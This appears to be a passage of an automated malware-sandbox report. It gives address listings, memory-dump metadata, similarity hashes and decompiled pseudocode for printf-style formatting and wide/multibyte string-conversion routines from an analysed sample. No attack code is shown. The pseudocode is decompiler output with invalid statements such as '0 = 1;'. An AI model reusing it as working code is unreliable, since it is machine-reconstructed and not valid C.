                                                  0x00402a8a
                                                  0x00402a92
                                                  0x00402a98
                                                  0x00402a9c
                                                  0x00402ab0
                                                  0x00402ab0
                                                  0x00402ab3
                                                  0x00402abb
                                                  0x00402ac1
                                                  0x00402ac3
                                                  0x00402ac3
                                                  0x00402ac9
                                                  0x00402acb
                                                  0x00402acb
                                                  0x00402ad1
                                                  0x00402ad3
                                                  0x00402ad9
                                                  0x00402adb
                                                  0x00402adb
                                                  0x00402ad9
                                                  0x00402ae1
                                                  0x00402ae3
                                                  0x00402ae3
                                                  0x00000000
                                                  0x00402ae1
                                                  0x00402a9e
                                                  0x00402aa2
                                                  0x00402aa2
                                                  0x00402aa5
                                                  0x00402aab
                                                  0x00402aac
                                                  0x00000000
                                                  0x00402aa2

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: (null)$(null)$0123456789ABCDEF$0123456789abcdef$@hqt
                                                  • API String ID: 1302938615-2614879473
                                                  • Opcode ID: f15a26fcb67ac8c3f723ce47954d20d7f10a52d8297a6c6917a27ee851928607
                                                  • Instruction ID: 97c5a029f7bd061deed5de53ae2c465ffe7a046d42d5ccbe6c0c10904c055f90
                                                  • Opcode Fuzzy Hash: f15a26fcb67ac8c3f723ce47954d20d7f10a52d8297a6c6917a27ee851928607
                                                  • Instruction Fuzzy Hash: 6D916E706047028FCB25CF18C98862BB7E5EF85344F24497FE49AA77D1D7B8A881CB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040306C Relevance: 9.2, APIs: 4, Strings: 1, Instructions: 410COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 95%
                                                  			E0040306C(signed int _a4, signed int _a8, signed short* _a12, intOrPtr _a16) {
				char _v5;
				short _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char* _v32;
				signed int _v36;
				signed int _v40;
				int _v44;
				signed int _v48;
				signed int _v52;
				int _v56;
				short _v60;
				intOrPtr _v64;
				char _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v108;
				signed int _t249;
				void* _t259;
				void* _t274;
				intOrPtr _t305;
				signed int* _t341;
				void* _t343;

				_v16 = _a4;
				L1:
				while(( *_a12 & 0x0000ffff) != 0 && _a8 > 1) {
					if(( *_a12 & 0x0000ffff) == 0x25) {
						_a12 =  &(_a12[1]);
						if(( *_a12 & 0x0000ffff) != 0x25) {
							_t341 =  &_v84;
							_a12 =  &(_a12[E004027D0(_a12, _t341)]);
							_v28 = _v72;
							if(_v28 == 1) {
								_a16 = _a16 + 4;
								_v68 =  *(_a16 - 4);
							} else {
								if(_v28 == 2) {
									_a16 = _a16 + 4;
									_v68 =  *(_a16 - 4);
								} else {
									if(_v28 == 3) {
										_a16 = _a16 + 4;
										_v68 =  *(_a16 - 4);
									} else {
										if(_v28 == 4) {
											_a16 = _a16 + 4;
											_v68 =  *(_a16 - 4);
										} else {
											if(_v28 <= 4) {
												L24:
												_v68 = 0;
											} else {
												if(_v28 <= 7) {
													if((_v84 & 0x00000080) == 0) {
														if((_v84 & 0x00000100) == 0) {
															_a16 = _a16 + 4;
															asm("cdq");
															_v68 =  *(_a16 - 4);
															_v64 = _t341;
														} else {
															_a16 = _a16 + 8;
															_t305 = _a16;
															_v68 =  *(_t305 - 8);
															_v64 =  *((intOrPtr*)(_t305 - 4));
														}
													} else {
														_a16 = _a16 + 4;
														asm("cdq");
														_v68 =  *(_a16 - 4);
														_v64 = _t341;
													}
												} else {
													goto L24;
												}
											}
										}
									}
								}
							}
							_t249 = E00402979( &_v84,  &_v68,  &_v108, _a8 - 1, 1);
							_t343 = _t343 + 0xc;
							_v24 = _t249;
							_v48 = _v48 & 0x00000000;
							if((_v84 & 0x00000001) == 0) {
								_v20 = _v76;
								while(_v20 < _v80) {
									_t274 = 0x20;
									 *_v16 = _t274;
									_v16 = _v16 + 2;
									_v20 = _v20 + 1;
									_a8 = _a8 - 1;
								}
							}
							_v36 = _v72;
							if(_v36 > 7) {
								L67:
								if((_v84 & 0x00000001) != 0) {
									_v20 = _v76;
									while(_v20 < _v80) {
										_t259 = 0x20;
										 *_v16 = _t259;
										_v16 = _v16 + 2;
										_v20 = _v20 + 1;
										_a8 = _a8 - 1;
									}
								}
								_a8 = _a8 - _v24;
								continue;
							} else {
								switch( *((intOrPtr*)(_v36 * 4 +  &M004034D0))) {
									case 0:
										goto L1;
									case 1:
										if(IsDBCSLeadByte(_v68) != 0) {
											L36:
											__eax = 0;
											__ecx = _v16;
											 *__ecx = __ax;
											_v16 = _v16 + 1;
											__eax = _v16 + 2;
											_v16 = _v16 + 2;
										} else {
											 &_v12 =  &_v68;
											if(MultiByteToWideChar(0, 0,  &_v68, 1,  &_v12, 1) <= 0) {
												goto L36;
											} else {
												__eax = _v16;
												 *_v16 = _v12;
												_v16 = _v16 + 1;
												__eax = _v16 + 2;
												_v16 = _v16 + 2;
											}
										}
										goto L67;
									case 2:
										 *_v16 = _v68;
										_v16 = _v16 + 2;
										goto L67;
									case 3:
										__eax = _v68;
										_v32 = _v68;
										_v20 = _v20 & 0x00000000;
										while(1) {
											__eax = _v20;
											if(_v20 >= _v24) {
												break;
											}
											_v32 =  *_v32 & 0x000000ff;
											if(IsDBCSLeadByte( *_v32 & 0x000000ff) == 0) {
												_v40 = 1;
											} else {
												_v40 = 2;
											}
											__eax = _v40;
											_v44 = _v40;
											__eax =  &_v60;
											_v56 = MultiByteToWideChar(0, 0, _v32, _v44,  &_v60, 2);
											__eax = _v16;
											__ecx = _v56;
											 *_v16 =  *((intOrPtr*)(__ebp + __ecx * 2 - 0x3a));
											_v16 = _v16 + 1;
											__eax = _v16 + 2;
											_v16 = _v16 + 2;
											_v32 =  &(_v32[_v44]);
											_v32 =  &(_v32[_v44]);
											_v20 = _v20 + 1;
											_v20 = _v20 + 1;
										}
										goto L67;
									case 4:
										if(_v24 != 0) {
											_v24 = _v24 << 1;
											__edx = _v68;
											__ecx = _v16;
											__eax = E00403533(_v16, __edx, _v24 << 1);
										}
										__eax = _v24;
										__ecx = _v16;
										__eax = __ecx + _v24 * 2;
										_v16 = __ecx + _v24 * 2;
										goto L67;
									case 5:
										L55:
										0 = 1;
										0 =  *((char*)(__ebp + 0xffffffffffffff98));
										if( *((char*)(__ebp + 0xffffffffffffff98)) == 0x2d) {
											_push(0x2d);
											_pop(__eax);
											__ecx = _v16;
											 *__ecx = __ax;
											_v16 = _v16 + 1;
											__eax = _v16 + 2;
											_v16 = _v16 + 2;
											_v48 = 1;
										}
										goto L57;
									case 6:
										L57:
										__eax = _v24;
										_v20 = _v24;
										while(1) {
											__eax = _v20;
											if(_v20 >= _v76) {
												break;
											}
											_push(0x30);
											_pop(__eax);
											__ecx = _v16;
											 *__ecx = __ax;
											_v16 = _v16 + 1;
											__eax = _v16 + 2;
											_v16 = _v16 + 2;
											_v20 = _v20 + 1;
											_v20 = _v20 + 1;
											_a8 = _a8 - 1;
											_a8 = _a8 - 1;
										}
										__eax = _v48;
										_v20 = _v48;
										while(1) {
											__eax = _v20;
											if(_v20 >= _v24) {
												break;
											}
											__eax = _v20;
											__ax =  *(__ebp + _v20 - 0x68) & 0x000000ff;
											__ecx = _v16;
											 *__ecx = __ax;
											_v16 = _v16 + 1;
											__eax = _v16 + 2;
											_v16 = _v16 + 2;
											_v20 = _v20 + 1;
											_v20 = _v20 + 1;
										}
										goto L67;
									case 7:
										_v84 = _v84 & 0x00000002;
										if((_v84 & 0x00000002) != 0 && _a8 > 3) {
											_push(0x30);
											_pop(__eax);
											__ecx = _v16;
											 *_v16 = __ax;
											_v16 = _v16 + 1;
											__eax = _v16 + 2;
											_v16 = _v16 + 2;
											_v84 = _v84 & 0x00000020;
											if((_v84 & 0x00000020) == 0) {
												_v5 = 0x78;
											} else {
												_v5 = 0x58;
											}
											__ax = _v5;
											__ecx = _v16;
											 *__ecx = __ax;
											_v16 = _v16 + 1;
											__eax = _v16 + 2;
											_v16 = _v16 + 2;
											_a8 = _a8 - 1;
											__eax = _a8;
											_a8 = _a8;
											_v24 = _v24 - 1;
											__eax = _v24;
											_v24 = _v24;
										}
										goto L55;
								}
							}
						} else {
							 *_v16 =  *_a12;
							_v16 = _v16 + 2;
							_a12 =  &(_a12[1]);
							_a8 = _a8 - 1;
							continue;
						}
					} else {
						 *_v16 =  *_a12;
						_v16 = _v16 + 2;
						_a12 =  &(_a12[1]);
						_a8 = _a8 - 1;
						continue;
					}
					L76:
					return _v52;
				}
				 *_v16 = 0;
				if(_a8 <= 1) {
					_v52 = _v52 | 0xffffffff;
				} else {
					_v52 = _v16 - _a4 >> 1;
				}
				goto L76;
			}






























                                                  0x00403075
                                                  0x00000000
                                                  0x00403078
                                                  0x00403099
                                                  0x004030c5
                                                  0x004030d1
                                                  0x004030f8
                                                  0x00403109
                                                  0x0040310f
                                                  0x00403116
                                                  0x0040315e
                                                  0x00403167
                                                  0x00403118
                                                  0x0040311c
                                                  0x00403145
                                                  0x0040314f
                                                  0x0040311e
                                                  0x00403122
                                                  0x00403175
                                                  0x0040317e
                                                  0x00403124
                                                  0x00403128
                                                  0x00403189
                                                  0x00403192
                                                  0x0040312a
                                                  0x0040312e
                                                  0x004031f5
                                                  0x004031f7
                                                  0x00403134
                                                  0x00403138
                                                  0x0040319f
                                                  0x004031c1
                                                  0x004031e3
                                                  0x004031ec
                                                  0x004031ed
                                                  0x004031f0
                                                  0x004031c3
                                                  0x004031c9
                                                  0x004031cc
                                                  0x004031d2
                                                  0x004031d8
                                                  0x004031d8
                                                  0x004031a1
                                                  0x004031a7
                                                  0x004031b0
                                                  0x004031b1
                                                  0x004031b4
                                                  0x004031b4
                                                  0x0040313a
                                                  0x00000000
                                                  0x0040313a
                                                  0x00403138
                                                  0x0040312e
                                                  0x00403128
                                                  0x00403122
                                                  0x0040311c
                                                  0x0040320c
                                                  0x00403211
                                                  0x00403214
                                                  0x00403217
                                                  0x00403221
                                                  0x00403226
                                                  0x00403239
                                                  0x00403243
                                                  0x00403247
                                                  0x0040324f
                                                  0x0040322f
                                                  0x00403236
                                                  0x00403236
                                                  0x00403239
                                                  0x00403257
                                                  0x0040325e
                                                  0x00403463
                                                  0x00403469
                                                  0x0040346e
                                                  0x00403481
                                                  0x0040348b
                                                  0x0040348f
                                                  0x00403497
                                                  0x00403477
                                                  0x0040347e
                                                  0x0040347e
                                                  0x00403481
                                                  0x004034a2
                                                  0x00000000
                                                  0x00403264
                                                  0x00403267
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00403290
                                                  0x004032c0
                                                  0x004032c0
                                                  0x004032c2
                                                  0x004032c5
                                                  0x004032cb
                                                  0x004032cc
                                                  0x004032cd
                                                  0x00403292
                                                  0x0040329a
                                                  0x004032aa
                                                  0x00000000
                                                  0x004032ac
                                                  0x004032ac
                                                  0x004032b3
                                                  0x004032b9
                                                  0x004032ba
                                                  0x004032bb
                                                  0x004032bb
                                                  0x004032aa
                                                  0x00000000
                                                  0x00000000
                                                  0x00403275
                                                  0x0040327d
                                                  0x00000000
                                                  0x00000000
                                                  0x004032d5
                                                  0x004032d8
                                                  0x004032db
                                                  0x004032e8
                                                  0x004032e8
                                                  0x004032ee
                                                  0x00000000
                                                  0x00000000
                                                  0x004032f3
                                                  0x004032ff
                                                  0x0040330a
                                                  0x00403301
                                                  0x00403301
                                                  0x00403301
                                                  0x00403311
                                                  0x00403314
                                                  0x00403319
                                                  0x0040332d
                                                  0x00403330
                                                  0x00403333
                                                  0x0040333b
                                                  0x00403341
                                                  0x00403342
                                                  0x00403343
                                                  0x00403349
                                                  0x0040334c
                                                  0x004032e4
                                                  0x004032e5
                                                  0x004032e5
                                                  0x00000000
                                                  0x00000000
                                                  0x0040335a
                                                  0x0040335f
                                                  0x00403362
                                                  0x00403365
                                                  0x00403368
                                                  0x0040336d
                                                  0x0040336e
                                                  0x00403371
                                                  0x00403374
                                                  0x00403377
                                                  0x00000000
                                                  0x00000000
                                                  0x004033d3
                                                  0x004033d5
                                                  0x004033d9
                                                  0x004033e1
                                                  0x004033e3
                                                  0x004033e5
                                                  0x004033e6
                                                  0x004033e9
                                                  0x004033ef
                                                  0x004033f0
                                                  0x004033f1
                                                  0x004033f4
                                                  0x004033f4
                                                  0x00000000
                                                  0x00000000
                                                  0x004033fb
                                                  0x004033fb
                                                  0x004033fe
                                                  0x00403411
                                                  0x00403411
                                                  0x00403417
                                                  0x00000000
                                                  0x00000000
                                                  0x00403419
                                                  0x0040341b
                                                  0x0040341c
                                                  0x0040341f
                                                  0x00403425
                                                  0x00403426
                                                  0x00403427
                                                  0x00403406
                                                  0x00403407
                                                  0x0040340d
                                                  0x0040340e
                                                  0x0040340e
                                                  0x0040342c
                                                  0x0040342f
                                                  0x0040343b
                                                  0x0040343b
                                                  0x00403441
                                                  0x00000000
                                                  0x00000000
                                                  0x00403443
                                                  0x00403446
                                                  0x0040344c
                                                  0x0040344f
                                                  0x00403455
                                                  0x00403456
                                                  0x00403457
                                                  0x00403437
                                                  0x00403438
                                                  0x00403438
                                                  0x00000000
                                                  0x00000000
                                                  0x00403382
                                                  0x00403385
                                                  0x0040338d
                                                  0x0040338f
                                                  0x00403390
                                                  0x00403393
                                                  0x00403399
                                                  0x0040339a
                                                  0x0040339b
                                                  0x004033a1
                                                  0x004033a4
                                                  0x004033ac
                                                  0x004033a6
                                                  0x004033a6
                                                  0x004033a6
                                                  0x004033b0
                                                  0x004033b5
                                                  0x004033b8
                                                  0x004033be
                                                  0x004033bf
                                                  0x004033c0
                                                  0x004033c6
                                                  0x004033c7
                                                  0x004033c8
                                                  0x004033ce
                                                  0x004033cf
                                                  0x004033d0
                                                  0x004033d0
                                                  0x00000000
                                                  0x00000000
                                                  0x00403267
                                                  0x004030d3
                                                  0x004030dc
                                                  0x004030e4
                                                  0x004030ec
                                                  0x004030f3
                                                  0x00000000
                                                  0x004030f3
                                                  0x0040309b
                                                  0x004030a4
                                                  0x004030ac
                                                  0x004030b4
                                                  0x004030bb
                                                  0x00000000
                                                  0x004030bb
                                                  0x004034c9
                                                  0x004034cf
                                                  0x004034cf
                                                  0x004034af
                                                  0x004034b6
                                                  0x004034c5
                                                  0x004034b8
                                                  0x004034c0
                                                  0x004034c0
                                                  0x00000000

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: x
                                                  • API String ID: 0-2363233923
                                                  • Opcode ID: 21533f40404ba542226bfa8572420c01b3bad12608f7d901757c729db8ce7d7f
                                                  • Instruction ID: 4e8d1baafcd9fe7d340f139674cb4abfd1a667ece1923e9a5fd415ceb2f85a4a
                                                  • Opcode Fuzzy Hash: 21533f40404ba542226bfa8572420c01b3bad12608f7d901757c729db8ce7d7f
                                                  • Instruction Fuzzy Hash: 53029074D04249DFCB45CF98C985AAEBBF4FB09305F108466E826EB390D734AA52CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00402BF0 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 98%
                                                  			E00402BF0(short* _a4, short* _a8, void* _a12, intOrPtr _a16) {
				void* _v5;
				signed char _v6;
				short* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				short* _v36;
				signed int _v40;
				signed int _v44;
				char _v52;
				char _v60;
				intOrPtr _v64;
				short _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v108;
				signed int _t230;
				signed int _t252;
				intOrPtr _t308;
				signed int* _t343;
				void* _t346;

				_v6 = 0;
				if(_a4 == 0) {
					_v6 = 1;
					_a4 = E004034F0(0x400);
				}
				_v12 = _a4;
				L3:
				while( *_a12 != 0 && _a8 > 1) {
					if( *_a12 == 0x25 || _a4 == 0) {
						_a12 = _a12 + 1;
						if( *_a12 != 0x25) {
							_t343 =  &_v84;
							_a12 = E0040266E(_a12, _t343) + _a12;
							_v24 = _v72;
							if(_v24 == 1) {
								_a16 = _a16 + 4;
								_v68 =  *(_a16 - 4);
								L30:
								_t252 = E00402979( &_v84,  &_v68,  &_v108, _a8 - 1, 0);
								_t346 = _t346 + 0xc;
								_v20 = _t252;
								_v32 = _v32 & 0x00000000;
								if((_v84 & 0x00000001) != 0) {
									L35:
									_v40 = _v72;
									if(_v40 > 7) {
										L63:
										if((_v84 & 0x00000001) == 0) {
											L68:
											_a8 = _a8 - _v20;
											continue;
										}
										_v16 = _v76;
										while(_v16 < _v80) {
											 *_v12 = 0x20;
											_v12 =  &(_v12[0]);
											_v16 =  &(_v16[0]);
											_a8 = _a8 - 1;
										}
										goto L68;
									}
									switch( *((intOrPtr*)(_v40 * 4 +  &M0040304C))) {
										case 0:
											goto L3;
										case 1:
											__eax = _v12;
											 *_v12 = _v68;
											_v12 =  &(_v12[0]);
											_v12 =  &(_v12[0]);
											goto L63;
										case 2:
											if(WideCharToMultiByte(0, 0,  &_v68, 1,  &_v52, 5, 0, 0) != 0) {
												E00403533(_v12,  &_v52, _v20);
												_v12 = _v12 + _v20;
											}
											goto L63;
										case 3:
											__edx = _v68;
											__ecx = _v12;
											E00403533(_v12, __edx, _v20) = _v12;
											__eax = _v12 + _v20;
											_v12 = _v12 + _v20;
											goto L63;
										case 4:
											__eax = _v68;
											_v36 = _v68;
											_v16 = _v16 & 0x00000000;
											while(1) {
												__eax = _v16;
												if(_v16 >= _v20) {
													break;
												}
												__eax =  &_v60;
												_v28 = WideCharToMultiByte(0, 0, _v36, 1,  &_v60, 5, 0, 0);
												_v20 = _v20 - _v16;
												if(_v28 > _v20 - _v16) {
													_v20 = _v20 - _v16;
													_v28 = _v20 - _v16;
												}
												_v16 = _v16 + _v28;
												_v16 = _v16 + _v28;
												__edx =  &_v60;
												__ecx = _v12;
												E00403533(_v12, __edx, _v28) = _v12;
												__eax = _v12 + _v28;
												_v12 = _v12 + _v28;
												_v36 =  &(_v36[0]);
												__eax =  &(_v36[1]);
												_v36 =  &(_v36[1]);
											}
											goto L63;
										case 5:
											L55:
											0 = 1;
											0 =  *((char*)(__ebp + 0xffffffffffffff98));
											if( *((char*)(__ebp + 0xffffffffffffff98)) == 0x2d) {
												__eax = _v12;
												 *_v12 = 0x2d;
												_v12 =  &(_v12[0]);
												_v12 =  &(_v12[0]);
												_v32 = 1;
											}
											goto L57;
										case 6:
											L57:
											__eax = _v20;
											_v16 = _v20;
											while(1) {
												__eax = _v16;
												if(_v16 >= _v76) {
													break;
												}
												__eax = _v12;
												 *_v12 = 0x30;
												_v12 =  &(_v12[0]);
												_v12 =  &(_v12[0]);
												_v16 = _v16 + 1;
												_v16 = _v16 + 1;
												_a8 = _a8 - 1;
												_a8 = _a8 - 1;
											}
											_v20 = _v20 - _v32;
											__eax = _v32;
											__edx = __ebp + _v32 - 0x68;
											__ecx = _v12;
											E00403533(_v12, __edx, _v20 - _v32) = _v20;
											_v20 - _v32 = _v20 - _v32 + _v12;
											_v12 = _v20 - _v32 + _v12;
											goto L63;
										case 7:
											_v84 = _v84 & 0x00000002;
											if((_v84 & 0x00000002) != 0 && _a8 > 3) {
												__eax = _v12;
												 *_v12 = 0x30;
												_v12 =  &(_v12[0]);
												_v12 =  &(_v12[0]);
												_v84 = _v84 & 0x00000020;
												if((_v84 & 0x00000020) == 0) {
													_v5 = 0x78;
												} else {
													_v5 = 0x58;
												}
												__eax = _v12;
												 *_v12 = _v5;
												_v12 =  &(_v12[0]);
												_v12 =  &(_v12[0]);
												_a8 = _a8 - 1;
												__eax = _a8;
												_a8 = _a8;
												_v20 = _v20 - 1;
												__eax = _v20;
												_v20 = _v20;
											}
											goto L55;
									}
								}
								_v16 = _v76;
								while(_v16 < _v80) {
									 *_v12 = 0x20;
									_v12 =  &(_v12[0]);
									_v16 =  &(_v16[0]);
									_a8 = _a8 - 1;
								}
								goto L35;
							}
							if(_v24 == 2) {
								_a16 = _a16 + 4;
								_v68 =  *(_a16 - 4);
								goto L30;
							}
							if(_v24 == 3) {
								_a16 = _a16 + 4;
								_v68 =  *(_a16 - 4);
								goto L30;
							}
							if(_v24 == 4) {
								_a16 = _a16 + 4;
								_v68 =  *(_a16 - 4);
								goto L30;
							}
							if(_v24 <= 4) {
								L29:
								_v68 = 0;
								goto L30;
							}
							if(_v24 <= 7) {
								if((_v84 & 0x00000080) == 0) {
									if((_v84 & 0x00000100) == 0) {
										_a16 = _a16 + 4;
										asm("cdq");
										_v68 =  *(_a16 - 4);
										_v64 = _t343;
									} else {
										_a16 = _a16 + 8;
										_t308 = _a16;
										_v68 =  *(_t308 - 8);
										_v64 =  *((intOrPtr*)(_t308 - 4));
									}
								} else {
									_a16 = _a16 + 4;
									asm("cdq");
									_v68 =  *(_a16 - 4);
									_v64 = _t343;
								}
								goto L30;
							}
							goto L29;
						}
						 *_v12 =  *_a12;
						_v12 =  &(_v12[0]);
						_a12 = _a12 + 1;
						_a8 = _a8 - 1;
						continue;
					} else {
						 *_v12 =  *_a12;
						_v12 =  &(_v12[0]);
						_a12 = _a12 + 1;
						if(_a4 != 0) {
							_a8 = _a8 - 1;
							continue;
						}
						break;
					}
				}
				 *_v12 = 0;
				_t230 = _v6 & 0x000000ff;
				if(_t230 != 1) {
					if(_a8 <= 1) {
						_v44 = _v44 | 0xffffffff;
					} else {
						_v44 = _v12 - _a4;
					}
					return _v44;
				}
				if(_a8 > 1) {
					E00404E8B(_a4, _v12 - _a4);
					_t230 = E0040351E(_a4);
				}
				return _t230 | 0xffffffff;
			}




























                                                  0x00402bf6
                                                  0x00402bfe
                                                  0x00402c00
                                                  0x00402c0e
                                                  0x00402c0e
                                                  0x00402c14
                                                  0x00000000
                                                  0x00402c17
                                                  0x00402c38
                                                  0x00402c70
                                                  0x00402c7c
                                                  0x00402ca2
                                                  0x00402cb0
                                                  0x00402cb6
                                                  0x00402cbd
                                                  0x00402d05
                                                  0x00402d0e
                                                  0x00402da2
                                                  0x00402db3
                                                  0x00402db8
                                                  0x00402dbb
                                                  0x00402dbe
                                                  0x00402dc8
                                                  0x00402df7
                                                  0x00402dfa
                                                  0x00402e01
                                                  0x00402fb8
                                                  0x00402fbe
                                                  0x00402fed
                                                  0x00402ff3
                                                  0x00000000
                                                  0x00402ff3
                                                  0x00402fc3
                                                  0x00402fd6
                                                  0x00402fe1
                                                  0x00402fe8
                                                  0x00402fcc
                                                  0x00402fd3
                                                  0x00402fd3
                                                  0x00000000
                                                  0x00402fd6
                                                  0x00402e0a
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00402e4c
                                                  0x00402e52
                                                  0x00402e57
                                                  0x00402e58
                                                  0x00000000
                                                  0x00000000
                                                  0x00402e2d
                                                  0x00402e38
                                                  0x00402e44
                                                  0x00402e44
                                                  0x00000000
                                                  0x00000000
                                                  0x00402e63
                                                  0x00402e66
                                                  0x00402e6f
                                                  0x00402e72
                                                  0x00402e75
                                                  0x00000000
                                                  0x00000000
                                                  0x00402e7d
                                                  0x00402e80
                                                  0x00402e83
                                                  0x00402e91
                                                  0x00402e91
                                                  0x00402e97
                                                  0x00000000
                                                  0x00000000
                                                  0x00402e9f
                                                  0x00402eb2
                                                  0x00402eb8
                                                  0x00402ebe
                                                  0x00402ec3
                                                  0x00402ec6
                                                  0x00402ec6
                                                  0x00402ecc
                                                  0x00402ecf
                                                  0x00402ed5
                                                  0x00402ed8
                                                  0x00402ee1
                                                  0x00402ee4
                                                  0x00402ee7
                                                  0x00402e8c
                                                  0x00402e8d
                                                  0x00402e8e
                                                  0x00402e8e
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f3d
                                                  0x00402f3f
                                                  0x00402f43
                                                  0x00402f4b
                                                  0x00402f4d
                                                  0x00402f50
                                                  0x00402f56
                                                  0x00402f57
                                                  0x00402f5a
                                                  0x00402f5a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f61
                                                  0x00402f61
                                                  0x00402f64
                                                  0x00402f77
                                                  0x00402f77
                                                  0x00402f7d
                                                  0x00000000
                                                  0x00000000
                                                  0x00402f7f
                                                  0x00402f82
                                                  0x00402f88
                                                  0x00402f89
                                                  0x00402f6c
                                                  0x00402f6d
                                                  0x00402f73
                                                  0x00402f74
                                                  0x00402f74
                                                  0x00402f91
                                                  0x00402f95
                                                  0x00402f98
                                                  0x00402f9c
                                                  0x00402fa5
                                                  0x00402fab
                                                  0x00402fae
                                                  0x00000000
                                                  0x00000000
                                                  0x00402ef4
                                                  0x00402ef7
                                                  0x00402eff
                                                  0x00402f02
                                                  0x00402f08
                                                  0x00402f09
                                                  0x00402f0f
                                                  0x00402f12
                                                  0x00402f1a
                                                  0x00402f14
                                                  0x00402f14
                                                  0x00402f14
                                                  0x00402f1e
                                                  0x00402f24
                                                  0x00402f29
                                                  0x00402f2a
                                                  0x00402f30
                                                  0x00402f31
                                                  0x00402f32
                                                  0x00402f38
                                                  0x00402f39
                                                  0x00402f3a
                                                  0x00402f3a
                                                  0x00000000
                                                  0x00000000
                                                  0x00402e0a
                                                  0x00402dcd
                                                  0x00402de0
                                                  0x00402deb
                                                  0x00402df2
                                                  0x00402dd6
                                                  0x00402ddd
                                                  0x00402ddd
                                                  0x00000000
                                                  0x00402de0
                                                  0x00402cc3
                                                  0x00402cec
                                                  0x00402cf6
                                                  0x00000000
                                                  0x00402cf6
                                                  0x00402cc9
                                                  0x00402d1c
                                                  0x00402d25
                                                  0x00000000
                                                  0x00402d25
                                                  0x00402ccf
                                                  0x00402d30
                                                  0x00402d39
                                                  0x00000000
                                                  0x00402d39
                                                  0x00402cd5
                                                  0x00402d9c
                                                  0x00402d9e
                                                  0x00000000
                                                  0x00402d9e
                                                  0x00402cdf
                                                  0x00402d46
                                                  0x00402d68
                                                  0x00402d8a
                                                  0x00402d93
                                                  0x00402d94
                                                  0x00402d97
                                                  0x00402d6a
                                                  0x00402d70
                                                  0x00402d73
                                                  0x00402d79
                                                  0x00402d7f
                                                  0x00402d7f
                                                  0x00402d48
                                                  0x00402d4e
                                                  0x00402d57
                                                  0x00402d58
                                                  0x00402d5b
                                                  0x00402d5b
                                                  0x00000000
                                                  0x00402d9a
                                                  0x00000000
                                                  0x00402ce1
                                                  0x00402c86
                                                  0x00402c8c
                                                  0x00402c93
                                                  0x00402c9a
                                                  0x00000000
                                                  0x00402c40
                                                  0x00402c48
                                                  0x00402c4e
                                                  0x00402c55
                                                  0x00402c5c
                                                  0x00402c67
                                                  0x00000000
                                                  0x00402c67
                                                  0x00000000
                                                  0x00402c5e
                                                  0x00402c38
                                                  0x00402ffe
                                                  0x00403001
                                                  0x00403008
                                                  0x00403031
                                                  0x0040303e
                                                  0x00403033
                                                  0x00403039
                                                  0x00403039
                                                  0x00000000
                                                  0x00403042
                                                  0x0040300e
                                                  0x00403019
                                                  0x00403021
                                                  0x00403021
                                                  0x00000000

                                                  APIs
                                                    • Part of subcall function 004034F0: EnterCriticalSection.KERNEL32(004084D4,?,?,00403B95,?,0040223F), ref: 004034FA
                                                    • Part of subcall function 004034F0: GetProcessHeap.KERNEL32(00000008,?,?,?,00403B95,?,0040223F), ref: 00403503
                                                    • Part of subcall function 004034F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,00403B95,?,0040223F), ref: 0040350A
                                                    • Part of subcall function 004034F0: LeaveCriticalSection.KERNEL32(004084D4,?,?,?,00403B95,?,0040223F), ref: 00403513
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00402E25
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.588258601.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_400000_file.jbxd
                                                  Similarity
                                                  • API ID: CriticalHeapSection$AllocateByteCharEnterLeaveMultiProcessWide
                                                  • String ID: @hqt$x
                                                  • API String ID: 1990697408-949323934
                                                  • Opcode ID: 62f839fcb065556d5f7dcd38b687bddfe24a716fbc26124e9ff0c8591e262c80
                                                  • Instruction ID: de5f171b63c4cf2df39cc20dcf0b4069c023ec7fc3312addd72b1a41fde5bd40
                                                  • Opcode Fuzzy Hash: 62f839fcb065556d5f7dcd38b687bddfe24a716fbc26124e9ff0c8591e262c80
                                                  • Instruction Fuzzy Hash: F1029170904249EFDF41CF98DA89AAEBBF0BF09304F148466E855FB390D378AA41CB55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403CCC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E00403CCC(short* __edx, intOrPtr* _a4) {
				intOrPtr _t11;
				short* _t17;
				char* _t18;

				_t17 = __edx;
				_t18 = 0;
				_t11 = (WideCharToMultiByte(0xfde9, 0, __edx, 0xffffffff, 0, 0, 0, 0) & 0x0000ffff) - 1;
				 *_a4 = _t11;
				if(_t11 != 0) {
					_t18 = E004034F0(_t11 + 2);
					if(_t18 != 0) {
						WideCharToMultiByte(0xfde9, 0, _t17, 0xffffffff, _t18,  *_a4 + 1, 0, 0);
					}
				}
				return _t18;
			}




